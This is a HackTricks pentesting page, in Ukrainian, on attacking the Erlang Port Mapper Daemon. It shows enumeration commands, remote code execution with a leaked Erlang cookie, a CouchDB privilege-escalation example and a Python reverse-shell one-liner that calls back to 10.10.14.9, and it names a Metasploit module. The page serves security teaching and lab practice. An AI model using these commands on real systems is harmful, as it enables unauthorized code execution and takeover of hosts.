4369 - Pentesting Erlang Port Mapper Daemon (epmd)

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Якщо ви хочете побачити вашу компанію рекламовану на HackTricks або завантажити HackTricks у форматі PDF Перевірте ПЛАНИ ПІДПИСКИ!
Отримайте офіційний PEASS & HackTricks мерч
Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами на Twitter 🐦 @carlospolopm.
Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks та HackTricks Cloud репозиторіїв GitHub.

Базова інформація

Демон відображення портів Erlang (epmd) служить координатором для розподілених екземплярів Erlang. Він відповідає за відображення символьних імен вузлів на машинні адреси, забезпечуючи, що кожне ім'я вузла асоційоване з конкретною адресою. Ця роль epmd є важливою для безперервної взаємодії та комунікації між різними вузлами Erlang по мережі.

Порт за замовчуванням: 4369

PORT     STATE SERVICE VERSION
4369/tcp open  epmd    Erlang Port Mapper Daemon

Це використовується за замовчуванням при встановленні RabbitMQ та CouchDB.

Перелік

Ручний

echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369

#Via Erlang, Download package from here: https://www.erlang-solutions.com/resources/download.html
dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb
apt-get install erlang
erl #Once Erlang is installed this will promp an erlang terminal
1> net_adm:names('<HOST>'). #This will return the listen addresses

Автоматичний

nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>

PORT     STATE SERVICE VERSION
4369/tcp open  epmd    Erlang Port Mapper Daemon
| epmd-info:
|   epmd_port: 4369
|   nodes:
|     bigcouch: 11502
|     freeswitch: 8031
|     ecallmgr: 11501
|     kazoo_apps: 11500
|_    kazoo-rabbitmq: 25672

Віддалене підключення

Якщо ви зможете витікати аутентифікаційне печиво, ви зможете виконати код на хості. Зазвичай це печиво знаходиться в ~/.erlang.cookie і генерується erlang під час першого запуску. Якщо воно не змінене або не встановлене вручну, це випадковий рядок [A:Z] довжиною 20 символів.

greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn
Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]

Eshell V8.1 (abort with ^G)

At last, we can start an erlang shell on the remote system.

(test@target.fqdn)1>os:cmd("id").
"uid=0(root) gid=0(root) groups=0(root)\n"

Додаткова інформація за посиланням https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ Автор також ділиться програмою для перебору куків:

7KB

epmd_bf-0.1.tar.bz2

Локальне підключення

У цьому випадку ми будемо зловживати CouchDB для підвищення привілеїв локально:

HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE
(anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).
"homer\n"
(anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).

Приклад взято з https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution Ви можете використовувати машину Canape HTB для практики того, як експлуатувати цю вразливість.

Metasploit

#Metasploit can also exploit this if you know the cookie
msf5> use exploit/multi/misc/erlang_cookie_rce

Shodan

port:4369 "на порту"